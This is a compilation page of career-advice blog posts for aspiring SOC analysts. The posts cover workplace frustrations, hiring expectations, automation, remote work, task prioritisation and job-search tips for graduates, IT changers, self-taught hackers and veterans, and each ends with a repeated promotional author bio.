Search Results

What is a Major Frustration of Being a SOC Analyst This job isn’t without its moments, but those great moments come with a price tag of frustrating things you might encounter as a SOC analyst. This is What is a Major Frustration of Being a SOC Analyst? Here is the big one that is on my list from having worked at so many SOCs: The larger the company the more they can pay but the less they can move. It is frustrating to spend a lot of time on a security event and make recommendations for improvements and not see any results. Small companies can incorporate feedback the same day and you get all the feel goods that you did something positive. That rewarding feedback that you just made the program better. Whereas you might investigate that same alarm at a large company a hundred times before they are able to make any improvements, if they can incorporate any feedback at all. Some companies are too big to move at all it would seem. This leads to alert fatigue where you’re auto closing incidents that look alike and you become a brainless drone in pursuit of good numbers. Having the ability to close a feedback loop at a large company takes skill, patience, persistence, and the ability to manage without authority. A feedback loop in a process is when the end result gives feedback to the beginning to improve the process. For example, a soc analyst concludes in their investigation that this event is a false positive so they take a bunch of time to collect all the evidence of all the previous false positives, write an analysis, and submit it to the team that creates the detection rules so that they can tune it and improve the efficiency of the SOC. In the long run, this saves the company a ton of money but in the short term it hurts your numbers: how many events you’ve worked on that day. Terrible inexperienced management only sees the numbers and not the impact. At small companies you tend to know your colleagues better and there is less tape preventing this kind of feedback from improving your work (and mental health) so things get done quickly. They are nimble and agile. I’ve worked at companies so large that I was convinced they aren’t improving the program on purpose because when I took so much time to gather the evidence and present it in a matter-of-fact and easy-to-understand way it was just ignored. What I noticed about my peers is they all have tried doing this too, and they just stopped because there wasn’t any improvement. It was a waste of time. This results in an incredibly inefficient and dangerous SOC where the team members have zero morale and zero care about their work. They are just brainless sisyphus’ clocking in and clocking out and getting nowhere with their work or their careers. What’s on your list? Tyler Wall is the founder of Cyber NOW Education. He holds bills for a Master of Science from Purdue University and CISSP, CCSK, CFSR, CEH, Sec+, Net+, and A+ certifications. He mastered the SOC after having held every position from analyst to architect and is the author of three books, 100+ professional articles, and ten online courses specifically for SOC analysts. You can connect with him on LinkedIn . You can sign up for a Lifetime Membership  of Cyber NOW® with a special deal for 15% off with coupon code "KB15OFF" which includes all courses, certification, the cyber range, the hacking lab, webinars, the extensive knowledge base, forums, and spotlight eligibility, to name a few benefits. Download the Azure Security Labs  eBook from the Secure Style Store. These labs walk you through several hands-on fun labs in Microsoft Azure, leaving you with the know-how to create a gig in Fiverr or Upwork to start your cybersecurity freelancing. Some of our free resources include the  Forums , the Knowledge Base , our True Entry Level SOC Analyst Jobs , Job Hunting Application Tracker , Resume Template ,  and Weekly Networking Checklist . Ensure you create an account or enter your email to stay informed of our free giveaways and promos, which we often offer. Check out my latest book,  Jump-start Your SOC Analyst Career: A Roadmap to Cybersecurity Success,  2nd edition, published June 1st, 2024, and winner of the 2024 Cybersecurity Excellence Awards and a finalist in the Best Book Awards. If you enjoy audiobooks, I suggest the Audible version, but you can also get it in beautiful paperback, kindle, or PDF versions. The downloadable PDF version can be grabbed here .

Looking for the Ideal SOC Analyst I need success stories. But who can I find to help get a job? It'd need to be someone with the right education that doesn't have the zing that I can give it. Someone with a bachelor's degree and a sec+ would do. If they have help desk experience that's a bonus. Any experience in IT certainly makes finding a job as an Ideal SOC Analyst easier. They'd need to live near a large city but not one with a high cost of living. Salaries are too high there and employers are moving away from them because of the cost of living. They say it's the taxes and that's partially true but really it's because they can't pay triple their labor costs and they can't come out and say "we want to pay people less". Dallas, Texas is good. Atlanta, Georgia. There's a large list of places companies are migrating to or growing where they already have a location. Somewhere where there's opportunity but not too expensive. Is that where you live? A masters degree is too much. It's counterintuitive but employers might think you'll find something better too quickly when you get experience. If you have one, that's fine, but a Bachelor's degree is better for the short term. Ideally it'd be a computer science degree. Cybersecurity degrees teach high level policy that not applicable for years and years and you have to be really technical for entry level roles. Gender, race, sexual identity doesn't matter. There's an equal amount of employers looking for a balance to their teams than there is to fit their culture I would think. Must be US citizen. That's important. Must have blog and show that the community means something to you. The hiring manager will look at your blog if you link it on your resume. Blog your journey to becoming a SOC analyst. Any how-tos and walk throughs of things you've learned. Write reviews of resources you've consumed (books, courses, etc..) giving honest feedback for your peers. Must attend local cybersecurity groups. 2600, Def Con groups, OWASP, maker spaces, and hacker spaces. Must be building your network, making the coffee, and building your contacts. Sharing your resume and taking other people's resume to share with others. If you've presented something, put it on your resume. Great places to pick a topic you know something about and present about it for a resume addition. Must be in online discords. Show personality and uniqueness. Be supportive of your peers and help contribute to those that need help. Don't be a d*ck. Must be modest about LinkedIN. You should have one, but you shouldn't be too personal, kept professional. Shouldn't be an embarrassment but should contribute occasionally and show support to your colleagues. You want to show teamwork and that you can get along with your peers. Don't want to show "Look at me" unless you've really just accomplished something sparingly like a degree or certification. Must have a home lab, preference if its in the cloud and they can read about your projects on your blog. Chances are this doesn't sound like you And this person is super difficult to find. While you can't change things like where you live so easily, you can improve your odds to becoming the passionate security nerd they're looking for. The hiring process is always going to require a fair amount of sheer luck. Suppose you just wake up feeling a million bucks that day and ace the interviews. You'd have a better chance. Not every day is a perfect day and bad interviews happen. But on paper, before the interviews, these are some of the things that you can think about doing that will increase your odds of becoming the ideal SOC analyst candidate. Tyler Wall is the founder of Cyber NOW Education. He holds bills for a Master of Science from Purdue University and CISSP, CCSK, CFSR, CEH, Sec+, Net+, and A+ certifications. He mastered the SOC after having held every position from analyst to architect and is the author of three books, 100+ professional articles, and ten online courses specifically for SOC analysts. You can connect with him on LinkedIn . You can sign up for a Lifetime Membership  of Cyber NOW® with a special deal for 15% off with coupon code "KB15OFF" which includes all courses, certification, the cyber range, the hacking lab, webinars, the extensive knowledge base, forums, and spotlight eligibility, to name a few benefits. Download the Azure Security Labs  eBook from the Secure Style Store. These labs walk you through several hands-on fun labs in Microsoft Azure, leaving you with the know-how to create a gig in Fiverr or Upwork to start your cybersecurity freelancing. Some of our free resources include the  Forums , the Knowledge Base , our True Entry Level SOC Analyst Jobs , Job Hunting Application Tracker , Resume Template ,  and Weekly Networking Checklist . Ensure you create an account or enter your email to stay informed of our free giveaways and promos, which we often offer. Check out my latest book,  Jump-start Your SOC Analyst Career: A Roadmap to Cybersecurity Success,  2nd edition, published June 1st, 2024, and winner of the 2024 Cybersecurity Excellence Awards and a finalist in the Best Book Awards. If you enjoy audiobooks, I suggest the Audible version, but you can also get it in beautiful paperback, kindle, or PDF versions. The downloadable PDF version can be grabbed here .

We’ve been hearing for years and I’ve said it, too.“There will always be a need for SOC analysts because there’s somethings that machines cannot do.” This is Am I going to be automated out of a SOC analyst job? But that’s not the hard truth. The hard truth is there’s a dashboard that lists in dollars the amount of how much SOAR tools have saved in labor hours. Some of them even count it in headcount. So this whole debauchery about you shouldn’t be worried about your job is straight garbage. The truth is if you’re just now starting, automation has already automated analysts work just like yours. Instead of leaving the more complex work that machines cannot do to human analysts, they’re accepting the risk and just moving on. Automation has gotten better over the years and what used to take a team of seasoned developers to code now can be configured with just pointing and clicking and dragging and dropping. There used to be a knowledge gap between the developers and the SOC skills they were automating so progress wasn’t quick. The best solution they came up with was to put Senior SOC Analysts in the same room as the coders who are automating. And it worked OK, except that Senior SOC Analyst was in a predicament. They were helping automate their own job. Years ago the car factories went through a similar process where the assembly lines were robotized. They had this figured out. They hired outside consultants to come in and build the automation to avoid the issues of workers having to automate their own jobs. And they successfully automated assembly lines. Did it displace workers? You bet it did. 1.7 million jobs in manufacturing have been lost since just year 2000. It is expected in just the next six years 14% of all jobs in the US will be impacted by AI and Automation. It’s automation as a SOC Analyst that you need to be concerned about. Most of our tasks are repeatable and I hate to say this, but they are brainless to do once you learn how. You can teach a robot to do most of the work and never have to think of it again. The SOC is going to be drastically displaced by machines and it’s already began. Is cybersecurity the right career for someone just starting out and looking for a growing in-demand field? Probably not. That ship has sailed. We’re shrinking now. Does this mean you shouldn’t follow you’re dreams? NOT AT ALL. I’ve said this time and time again since the golden age of cybersecurity when there wasn’t an unemployed soul on earth and it hasn’t changed today. DO NOT PURSUE this career if you don’t like it. It’s an extraordinary commitment that you can only do if you have an interest. This isn’t like taking a job at say a paper mill where it’s just a paycheck. You have to like it so much you are proactive in learning or you’ll be out of a job anyway. So where does this leave you if you like cybersecurity and it’s shrinking? Stick to the cloud. The clouds are the most in-demand area in cybersecurity and in IT in general and it’s less impacted by automation because its so new. Cloud engineering is extremely complex and it’s going to take some time to automate those workflow and you’ll have enough time to work your way out of the SOC. Start now. Start with the cloud NOW! But only if you like it. Tyler Wall is the founder of Cyber NOW Education. He holds bills for a Master of Science from Purdue University and CISSP, CCSK, CFSR, CEH, Sec+, Net+, and A+ certifications. He mastered the SOC after having held every position from analyst to architect and is the author of three books, 100+ professional articles, and ten online courses specifically for SOC analysts. You can connect with him on LinkedIn . You can sign up for a Lifetime Membership  of Cyber NOW® with a special deal for 15% off with coupon code "KB15OFF" which includes all courses, certification, the cyber range, the hacking lab, webinars, the extensive knowledge base, forums, and spotlight eligibility, to name a few benefits. Download the Azure Security Labs  eBook from the Secure Style Store. These labs walk you through several hands-on fun labs in Microsoft Azure, leaving you with the know-how to create a gig in Fiverr or Upwork to start your cybersecurity freelancing. Some of our free resources include the  Forums , the Knowledge Base , our True Entry Level SOC Analyst Jobs , Job Hunting Application Tracker , Resume Template ,  and Weekly Networking Checklist . Ensure you create an account or enter your email to stay informed of our free giveaways and promos, which we often offer. Check out my latest book,  Jump-start Your SOC Analyst Career: A Roadmap to Cybersecurity Success,  2nd edition, published June 1st, 2024, and winner of the 2024 Cybersecurity Excellence Awards and a finalist in the Best Book Awards. If you enjoy audiobooks, I suggest the Audible version, but you can also get it in beautiful paperback, kindle, or PDF versions. The downloadable PDF version can be grabbed here .

Working from home is new to the SOC. Prior to COVID, almost all employers required you to work from a dedicated room for the SOC. This was in a highly secure area, often times with no windows. I quit a six figure SOC job just because they had us crammed in a room like sardines. It was so hot and there was so much drama about the thermostat it was unbelievable. It was just a tiny narrow windowless room at the center of the building that was designed in a working concept known as a bullpen. A bullpen is where there are just rows of monitors and chairs at a long desk with no dividers or personal space. I left that job and got my own happy little cubical where I spent the next few years. Then I landed my first remote work role. This is How to Work from Home in the SOC? The first thing that I had to learn is about routines. The SOC is mainly shift work so you’ll have set hours that you need to work. This is either morning, day, or night shift. So I am going to stray from calling it a ‘morning routine’. In my most recent roles I have been working with the SOC as an Advisor but I set my own hours and it only becomes increasingly difficult to maintain the boundary of work and personal. Before you work there needs to be a ‘getting started routine’. This could be anything from listening to a podcast for an hour while you eat, putting your favorite pug slippers on, and then logging into work. Or even watching an episode of the Simpsons, filling your water bottle up, and grabbing a snack before sitting down at your desk. It doesn’t really matter what the routine is, but you need to do it every single day to train your brain that this is me going to work. I am commuting now. And the same thing for when you end work. When you end work you might go check your snail mail, take a walk, or cook dinner. Do it everyday. This is you commuting home. What you are practicing is setting boundaries. In Microsoft Teams, or Slack, or other instant messaging clients used for work they have settings for when you’re off work. Use them. When you are not at work, there is no longer an expectation that you can be contacted immediately. If the building burnt down for whatever reason and they needed you, HR and your manager has your phone number. Do this even when you want to work all the time. These are your boundaries and you need to stick to them. I mention this because I have been contacted by colleagues from other countries who for them it is normal business hours, and I have been tired and in bed, and against my best judgement have answered these messages and aside from not answering them correctly, I wasn’t in good spirits. I began to develop a resentment that I was having to ‘work all the time’ but it was my own fault . My manager never had the expectation that I needed to be working then. You must create boundaries. For the first couple of years of remote working, I siloed myself, lived in a desert alone, and as a result I just wasn’t able to get as much done. I had to learn things like how to build rapport with my teammates and that it needs to be intentional. With remote working you don’t get that ‘water cooler’ talking and accidentally bumping into each other in the halls anymore. Its easy not to place an importance on just taking a little time to chat with your coworkers from time to time. It’s easy to get isolated and not feel a part of the team. When you need help with something it’s awkward to ask strangers so you waste more of your time and the companies time trying to figure it out yourself, and strangers don’t know you well enough to know your strengths to ask you for help so you’re not building any leadership or mentoring skills that will help your career in the long run. The biggest thing that I have learned to avoid in remote working is isolation. Appearance does matter and I’ll be the unpopular one to tell you that. And it has a lot to do with lighting which is an easy fix. In my honest experience, and there are a rare few exceptions, nobody cares if you are fat, or skinny, where you come from, or what color you are, and they don’t care how you define yourself. I wouldn’t recommend making it your headliner either or put it on your resume. What they care about is that you look like you take care of yourself. If you don’t take care of yourself the first impression is that they won’t trust you to take care of your work. Bad lighting can make a model look homeless. That is my big tip for improving appearances, other than keeping your hair cut. So you’re welcome. Most people come on camera in T-shirts and most women on your team will only wear makeup the first few meetings then it’s like having a sister. I don’t know if you’ve ever had a sister, but they don’t wear makeup when they’re hanging around the house. I use a small device called a Lume Cube that I just recently found out about. I am mentioning this because I have terrible lighting in my office and I’ve learned the hard way that it plays a role in your work life. Also, on video it looks better to not have to use the automatic background remover with Zoom or Teams, so try facing your desk against a wall if you can but it’s not nearly as big of a deal as lighting. The Lume Cube can suction onto your laptop and you can use it everywhere you go. But note, I haven’t found the suction cup to be all that great so it might be worth getting the stand for it , too. Since I only use it at home I rubbed purple glue stick over the suction cup and put it on the back of my monitor and it hasn’t moved since. Its a simple solution and I’m happy with it. Lighting can get complicated and I just needed something that didn’t make me look like a troll. Other than for work, I use it to record my trainings for my Udemy classes. Note: In your interview wear a button-down t-shirt and wear nice pants, belt, and shoes if youre a guy. You want to feel as confident as you can for interviews. Looking your best even though they don’t know makes you feel good and it shows. I’m not qualified to give advice for ladies, sorry. Tyler Wall is the founder of Cyber NOW Education. He holds bills for a Master of Science from Purdue University and CISSP, CCSK, CFSR, CEH, Sec+, Net+, and A+ certifications. He mastered the SOC after having held every position from analyst to architect and is the author of three books, 100+ professional articles, and ten online courses specifically for SOC analysts. You can connect with him on LinkedIn . You can sign up for a Lifetime Membership  of Cyber NOW® with a special deal for 15% off with coupon code "KB15OFF" which includes all courses, certification, the cyber range, the hacking lab, webinars, the extensive knowledge base, forums, and spotlight eligibility, to name a few benefits. Download the Azure Security Labs  eBook from the Secure Style Store. These labs walk you through several hands-on fun labs in Microsoft Azure, leaving you with the know-how to create a gig in Fiverr or Upwork to start your cybersecurity freelancing. Some of our free resources include the  Forums , the Knowledge Base , our True Entry Level SOC Analyst Jobs , Job Hunting Application Tracker , Resume Template ,  and Weekly Networking Checklist . Ensure you create an account or enter your email to stay informed of our free giveaways and promos, which we often offer. Check out my latest book,  Jump-start Your SOC Analyst Career: A Roadmap to Cybersecurity Success,  2nd edition, published June 1st, 2024, and winner of the 2024 Cybersecurity Excellence Awards and a finalist in the Best Book Awards. If you enjoy audiobooks, I suggest the Audible version, but you can also get it in beautiful paperback, kindle, or PDF versions. The downloadable PDF version can be grabbed here .

If you can take one very big hairy audacious goal (BHAG) and break it down its many smaller goals the result is what’s called the snowball effect. Once you complete the first small goal, you get a mental boost to complete the next. And then the next. Before you know it, you’ve accomplished something and it doesn’t feel all that big anymore. Often times you’ll look back and think the hardest part about the BHAG was getting started. It really, truly is about micro goals. This is How to Set SOC Analyst Goals? I would also tell you that a successful career is about choosing your tasks and the time you spend on them with tact. What I mean by that is everyone seems to be always overworked and those who excel are those who can prioritize and deliver on the tasks that give the most bang for the buck. There isn’t enough time in a two lifetimes to complete everything that I’ve been asked to do in my career. At times I’ve been asked to do things that no one cares about and that’s the last I ever hear about it. It would take me days to do it and it would interfere with more important things to do. Then I get asked to do something that is easy to do that ultimately lands on the CEO’s desk. Which one of those two do you do? Its a no brainier, you smash the task and over deliver on the vision of the executives. The Eisenhower Matrix is a task management tool that helps you organize and prioritize tasks by urgency and importance. Using the tool, you’ll divide your tasks into four boxes based on the tasks you’ll do first, the tasks you’ll schedule for later, the tasks you’ll delegate, and the tasks you’ll delete. In this piece, we’ll explain how to set up an Eisenhower Matrix and provide tips for task prioritization. Making a to-do list is the first step toward getting work done. But how do you determine what to tackle first when you don’t have enough time to do everything in one day? With effective prioritization, you can increase your productivity and ensure that your most urgent tasks get immediate attention. The Eisenhower Matrix is a task management tool that helps you distinguish between urgent and important tasks so you can establish an efficient workflow. Dwight D. Eisenhower — the 34th President of the United States and a five-star general during World War II — presented the idea that would later lead to the Eisenhower Matrix. In a 1954 speech, Eisenhower quoted an unnamed university president when he said, “I have two kinds of problems, the urgent and the important. The urgent are not important, and the important are never urgent.” Stephen Covey, author of The 7 Habits of Highly Effective People , took Eisenhower’s words and used them to develop the now-popular task management tool known as the Eisenhower Matrix. The Eisenhower Matrix is also known as the time management matrix, the Eisenhower Box, and the urgent-important matrix. This tool helps you divide your tasks into four categories: the tasks you’ll do first, the tasks you’ll schedule for later, the tasks you’ll delegate, and the tasks you’ll delete. Urgent tasks require your immediate attention. When something is urgent, it must be done now, and there are clear consequences if you don’t complete these tasks within a certain timeline. These are tasks you can’t avoid, and the longer you delay these tasks, the more stress you’ll likely experience, which can lead to burnout. Like the Executive high-visibility request above. OVER deliver on that. Important tasks may not require immediate attention, but these tasks help you achieve your long-term goals. Just because these tasks are less urgent doesn’t mean they don’t matter. You’ll need to thoughtfully plan for these tasks so you can use your resources efficiently. Quadrant 1: Do Quadrant one is the “do” quadrant, and this is where you’ll place any tasks that are both urgent and important. When you see a task on your to-do list that must be done now, has clear consequences, and affects your long-term goals, place it in this quadrant. There should be no question about which tasks fall into this quadrant, because these are the tasks that are at the front of your mind and are likely stressing you out the most. These are the phishing emails to executives. Quadrant 2: Schedule Quadrant two is the “schedule” quadrant, and this is where you’ll place any tasks that are not urgent but are still important. Because these tasks affect your long-term goals but don’t need to be done right away, you can schedule these tasks for later. You’ll tackle these tasks right after you tackle the tasks in quadrant one. You can use various time management tips to help you accomplish the tasks in this quadrant. Some helpful strategies may include the Pareto principle or the Pomodoro method . These are your development goals. Quadrant 3: Delegate Quadrant three is the “delegate” quadrant, and this is where you’ll place any tasks that are urgent but not important. These tasks must be completed now, but they don’t affect your long-term goals. Because you don’t have a personal attachment to these tasks and they likely don’t require your specific skill set to complete, you can delegate these tasks to other members of your team. Delegating tasks is one of the most efficient ways to manage your workload and give your team the opportunity to expand their skill set. As a junior SOC analyst, theres no one below you. If you have an MSSP, it would be a good time to see if the tasks can be delegated to them. But, you do have teammates, and you should act like a team. If you pick up a ticket and someone else is already halfway through working on a similar ticket, don’t be shy and ask them if they’d like to work on this one too. It makes their metrics look better and keeps the SOC efficient. This is queue management Quadrant 4: Delete Once you’ve gone through your to-do list and added tasks to the first three quadrants, you’ll notice that a handful of tasks are left over. The tasks left over are tasks that weren’t urgent or important. These unimportant, non-urgent distractions are simply getting in the way of you accomplishing your goals. Place these remaining items on your to-do list in the fourth quadrant, which is the “delete” quadrant. But remember, if something you deleted keeps popping back up on your radar, its time to reevaluate the importance of the task. These are special projects that you don’t have any time for Zig Zigler will say “You can have everything you want in life, if you will just help other people get what they want.” I will always encourage people to ask me for things because I believe in the motto, “If you never ask the answer is always no”, and I’m not afraid to say no. So prioritize correctly, get more done, and push the envelope sometimes in your career if you deserve it. Tyler Wall is the founder of Cyber NOW Education. He holds bills for a Master of Science from Purdue University and CISSP, CCSK, CFSR, CEH, Sec+, Net+, and A+ certifications. He mastered the SOC after having held every position from analyst to architect and is the author of three books, 100+ professional articles, and ten online courses specifically for SOC analysts. You can connect with him on LinkedIn . You can sign up for a Lifetime Membership  of Cyber NOW® with a special deal for 15% off with coupon code "KB15OFF" which includes all courses, certification, the cyber range, the hacking lab, webinars, the extensive knowledge base, forums, and spotlight eligibility, to name a few benefits. Download the Azure Security Labs  eBook from the Secure Style Store. These labs walk you through several hands-on fun labs in Microsoft Azure, leaving you with the know-how to create a gig in Fiverr or Upwork to start your cybersecurity freelancing. Some of our free resources include the  Forums , the Knowledge Base , our True Entry Level SOC Analyst Jobs , Job Hunting Application Tracker , Resume Template ,  and Weekly Networking Checklist . Ensure you create an account or enter your email to stay informed of our free giveaways and promos, which we often offer. Check out my latest book,  Jump-start Your SOC Analyst Career: A Roadmap to Cybersecurity Success,  2nd edition, published June 1st, 2024, and winner of the 2024 Cybersecurity Excellence Awards and a finalist in the Best Book Awards. If you enjoy audiobooks, I suggest the Audible version, but you can also get it in beautiful paperback, kindle, or PDF versions. The downloadable PDF version can be grabbed here .

This article will discuss background-specific tips for landing your first SOC Analyst role. The four audiences are college graduates, IT career changers, Veterans, and the Autodidact. Each one has its nuance, making it worthwhile dedicating this article to your roadmap to success. Roadmap to Success This series has given you insight into what a SOC Analyst does on a day-to-day basis and general strategies for finding your first job in cybersecurity as a SOC Analyst. It was written to target four key audiences: the recent college graduate, those who are career-changing from other areas in IT, the transitioning military, and those who are self-taught. This article will give background-specific tips on things you need to know that apply directly to you. I will repeat myself through these four sections,  driving home the idea that you have to prove your interest and back it up with examples, which is in addition to hard technical skills. Veterans have extensive networks of people and partnerships just waiting for them to plug into, the college graduate has career services with their school to leverage, people transitioning from other areas of IT already have real life experience often in domains that overlap with cybersecurity, and lastly, the auto didactic’s strongest selling point is their projects and involvement with the community at large. I recommend that students of all backgrounds who are worried they don’t have much to talk about in an interview deploy a few honeypots. Then, take the data from them and analyze it. In the article The SOC Analyst Method, I explain how to analyze a security event. Practice this method on the honeypot attackers and find interesting things to discuss in the interview. One more plug. I will mention in this article how you should write your resume based on your particular background. Give it your best shot to write your resume, but just starting, it can be difficult to highlight what you know. I have worked out a deal with Resume Raiders on your behalf to offer a 20% discount on services, just use the coupon code SOCANALYSTNOW. I receive zero commissions or discounts, saving you about $60 for a complete resume rewrite. Dave also offers services for resume revision if only smaller changes are needed at a lesser price. He will share your resume on a Google Doc, and you will collaborate back and forth as he asks you questions. You answer them in comments, and then he will pen your resume. I use him myself; that’s the only reason I recommend him. So let’s get started. Recent Graduate Congratulations! You have or are about to graduate from college. It’s a monumental achievement, and I hope you’ve learned a lot. Maybe you had an internship, and that’s great because what you’re fighting now is a lack of experience. Getting experience with commercial tools is one of the most challenging things. They cost millions of dollars and work in highly complex enterprise environments. But the hiring manager knows that. What he’s looking for is experience with any projects you may have had while in school, any personal projects you’ve had, and overall, checking to  make sure you’re not a commodity graduate with zero interest in cybersecurity other than the paycheck. So many people graduate, don’t know anything, and have no real passion or interest in cybersecurity. That is the reputation you are fighting against concerning recent college graduates. Your resume should reflect the projects that you’ve worked on during school. Explore your career services from your school to see if they have people who know how to write your resume in a way that highlights the experience you gained from your curriculum. This should be your first stop, as they see what you’ve learned while in your program. And then maybe poke Resume Raiders for a revision if you’re not having any luck. You need a project to talk about. The question of why you like cybersecurity is inevitable, and you should be fully prepared to give them examples of the projects you’ve been a part of that you truly enjoyed. Eventually, what you want to do in cybersecurity will come up. One thing you have on your side from a formal education is experience with a variety of things, and you probably already know what you like and don’t like. So talk about the classes and projects you truly enjoyed and say you’d like to work in the SOC for a few years to get even more breadth of experience before deciding on a specialty. When you’re finally in the SOC, you’ll see how we do things in the real world. And it’s often much different than the Ivory Tower you’ve learned about in college. Sometimes it’s messy with lots of red tape, and your dream isn’t what it pans out to be. That is what happened to me as a penetration tester. I loved hacking around and had been doing it for years, and I thought all through college that this was precisely what I wanted to do, and I was so sure of myself. I started in the SOC, worked hard, became a pentester, and then learned I hated it. It was the worst! Luckily, I was already qualified to be a SOC Analyst, so I regrouped and found my way into Security Engineering with nothing lost. I haven’t strayed too far from the SOC ever since. Your degree is not going to get you a job alone. It’s an essential step in any career, but significantly less critical today than a while ago. Most big companies have removed the requirement to have a college degree but there are still some that require it. Those that require it, they should be your first applications while applying for jobs. Less people have college degrees so there might be less competition. From IT So you want to join the exciting world of cybersecurity. As you might know already, a SOC Analyst might be on temporary pay depending on their seniority in IT. You’re looking at around $80- $100k starting. But you might be considering it because you’ve hit the glass ceiling in IT, done your research, and know the glass ceiling is higher in cybersecurity. You might just be more interested in a domain in cybersecurity and need the SOC Analyst to get there. Whatever the reason, you’re reading this piece, and being a SOC Analyst is on your mind. There are a few things you need to know. It’s a lot like IT. The same problems you’re having in IT, you’re going to have in cybersecurity. On-call is typical; it changes rapidly, and there is a glass ceiling you’ll inevitably hit. After a while, you realize it’s a glorified customer service position. You might already have certifications that apply to cybersecurity, like any networking or Microsoft certifications, which are a plus; any CompTIA certifications are good, too. In general, you’re familiar with the certification game. You may be past the certification game in your career in IT, but be prepared to start it all over as an SOC Analyst. It almost sounds like I’m discouraging you from becoming a SOC Analyst, but I’m not. I know how important it is for us to do stuff we like. The only reason I’m writing a book is that I enjoy writing. It’s so challenging to be stuck doing work you don’t like, and to make it worse, you probably won’t be good at it. I would only suggest this path to someone from IT if they like cybersecurity. The reason doesn’t matter; just be prepared to discuss that in an interview. I recommend going to the ISC2 website, finding the domains of cybersecurity,  and writing your resume with skills and experience you gained at your previous employers in those domains. There will be a lot of overlap. Anyone with a significant amount of experience in IT is qualified for a SOC Analyst job, and since you picked up this book, you already know why you’re interested. Out of all the backgrounds this book applies to, your background will be the easiest to find work in cybersecurity. Experience trumps everything. Auto didactics Calling all hackers. You only really end up in this category if you’ve been hacking around at things for years and are sitting around thinking how it’d be great to do this for a living. Well, good news - it happens constantly, but there are some things to consider. How do you quantify experience with something you’re not supposed to be doing? First off, congratulations on staying out of jail, and I say that assuming you’ve kept your nose clean. If you haven’t, there aren’t many people who will hire you. It does happen, and some companies will employ extremely talented felons, but it’s rare, and what happens is they create their own companies, and other companies hire them as contractors. But that’s so rare, I won’t cover it in detail. Here’s what you do for those hacking away on their own. You play Capture the Flag competitions and set up labs. When asked what experience you have, tell them you set up labs and give the spiel about your lab environment before they can ask. You get a bug bounty and put it on your resume. You contribute to a community project or improve on a standard tool. You write your blog and publish articles about your research. It’s significantly more difficult for you to get a call back from a job posting and compete with all the other applicants with your resume alone. The tips for attending conferences, hackerspaces, makerspaces, and meetups are critical. You need to be at every single one and start contributing. Pick a topic and give presentations, or just make the coffee. Get on LinkedIn and add SOC Analysts, join a group, and contribute. You need a resume, but you also need to know someone on the inside to pick your resume from the pile and give you an interview. Out of all the backgrounds this book covers, it is the most difficult to land a job in cybersecurity because you need twice the skills as a college graduate, and excellent luck. However, you’ll likely succeed in the long run because you can’t teach passion. You’ll have to do a lot of work for free before you build the reputation to get paid for it. Veterans Veterans can access complimentary cybersecurity training and scholarships, enabling them to acquire the necessary knowledge, skills, and abilities (KSAs) for entry into the cybersecurity sector. The CyberCorps®: Scholarship for Service (SFS) initiative, a collaboration between the Department of Homeland Security (DHS) and the National Science Foundation (NSF), extends cybersecurity scholarships to exceptional undergraduate, graduate, and doctoral students. Eligible individuals can receive financial support ranging from $27,000 to $37,000 for their studies at participating institutions. SFS scholarships cover the typical expenses of full-time students at participating institutions, encompassing tuition and related fees for a maximum of two years. When combined with the Post-9/11 GI Bill, which provides up to 36 months of financial assistance for education and training in various fields, including cybersecurity, veterans may have the opportunity to earn a cybersecurity degree without incurring costs. The DHS facilitates training through the Federal Virtual Training Environment (FedVTE) platform, an online, on-demand training resource accessible to government employees and veterans. FedVTE offers over 800 hours of free training on cybersecurity and IT topics, ranging from beginner to advanced levels. The courses cover diverse areas such as ethical hacking, risk management, surveillance, and malware analysis. Additionally, they align with certifications like Network+, Security+, and Certified Information Systems Security Professional (CISSP). The  SANS Institute’s VetSuccess Academy  is tailored to support veterans in their cybersecurity endeavors; however, it has been mentioned that this SANS program should be viewed as more of a lottery ticket because they rarely see anyone get picked for any particular cohort. However, there is a success rate to have the GI bill pay for a SANS degree, which bundles individual certifications into a degree program. The certifications themselves are highly regarded in cybersecurity and very expensive. However, I have recently heard that the GI bill may no longer pay for SANS courses. One problem that is common with military folks is that they focus heavily on certifications but don’t get the hands-on experience and deep theory that they need for entry-level technical positions. To make matters worse, the people I’ve talked with don’t feel that cybersecurity degree programs prepare the transitioning military well, as they focus on high-level policy. The military trains you to look for qualifications and meet service ribbons/medals requirements. And since certifications don’t matter as much as practical hands-on project work, veterans fall prey to predatory bootcamps at an above-average rate, leaving them still unqualified to do the work or pass the interview. Note: They recommend a general computer science degree program at a brick and mortar college if you choose to go the degree route. Before you transition, be aware of Skillbridge . Essentially, it allows military members on active duty to spend the last 180 days of their time on active duty working (for free to the business) for a company  as an intern.  They maintain their military pay and benefits. The company gets a free intern. This often can pivot into a full-time offer upon separation from the service, but if not, it will give you a little experience and someone to vouch for you. Furthermore, VeteranSec serves as an online community for military veterans engaged in or interested in information technology and cybersecurity. The platform provides a private networking channel of over 7000 veterans, free training videos, partnerships with companies to take advantage of, and an informative cybersecurity blog with tutorials to aid veterans in their professional development. Summary I hope this article has provided a few additional helpful strategies for your road to success. Each of these backgrounds presents an opportunity for us to provide insights into the challenges, even reputations, that you are fighting against and need to be aware of as you trudge the road ahead. Use the tools given to you in this book, with the additional insight from this article to form a plan of attacking your job search and if you’re lucky, interviews. Not everyone will have the same experience with their journey to success. Some will be more difficult than others. We’re not all on the same playing field. I know that may not be what you want to hear, but corporate America, and capitalism in general, is a game. Once you learn the rules and what moves you forward, you can strategize what makes you desirable to employers. You build a brand for yourself. For me, it was certifications and education to start with, but after some years, I fail even to mention it during interviews, and I’m never asked about it because we’re too busy talking about experience. If you have experience, it trumps everything. If you don’t yet, you need a formal school, the community, your friends, any internships, former employers, and even yourself to vouch for you and provide examples to show your potential value. And for the lone hackers, the autodidacts, the self-taught, let’s all remember that, for whatever the case may be, they are the underdogs, but they are the few and the proud. Be nice to them and make friends, you’ll thank me later.

